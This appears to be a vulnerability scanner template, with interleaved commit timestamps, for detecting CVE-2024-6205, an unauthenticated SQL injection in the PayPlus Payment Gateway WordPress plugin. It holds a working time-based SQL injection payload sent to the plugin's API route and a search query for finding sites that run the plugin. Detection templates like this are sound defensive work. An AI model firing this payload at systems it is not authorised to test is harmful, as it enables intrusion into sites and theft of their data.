2024-07-19 18:36:26 +00:00
id : CVE-2024-6205
info :
name : PayPlus Payment Gateway < 6.6.9 - SQL Injection
author : securityforeveryone
severity : critical
description : |
The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.
remediation : Fixed in 6.6.9
reference :
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection
2024-07-19 20:30:24 +00:00
- https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087
2024-07-28 06:12:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-6205
2024-07-19 18:36:26 +00:00
classification :
2024-07-28 06:12:29 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-6205
2024-07-28 06:17:58 +00:00
cwe-id : CWE-89
2024-07-19 18:36:26 +00:00
epss-score : 0.00043
epss-percentile : 0.09301
metadata :
max-request : 1
2024-07-29 03:16:31 +00:00
vendor : payplus-ltd
product : payplus-payment-gateway
2024-07-19 18:36:26 +00:00
framework : wordpress
publicwww-query : "/wp-content/plugins/payplus-payment-gateway"
2024-07-28 06:12:29 +00:00
tags : wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment
2024-07-19 18:36:26 +00:00
http :
- raw :
- |
@timeout 20s
GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 302'
2024-07-28 06:12:29 +00:00
- "regex('^-1$', body)"
- 'contains(content_type,"text/html")'
2024-07-19 18:36:26 +00:00
condition : and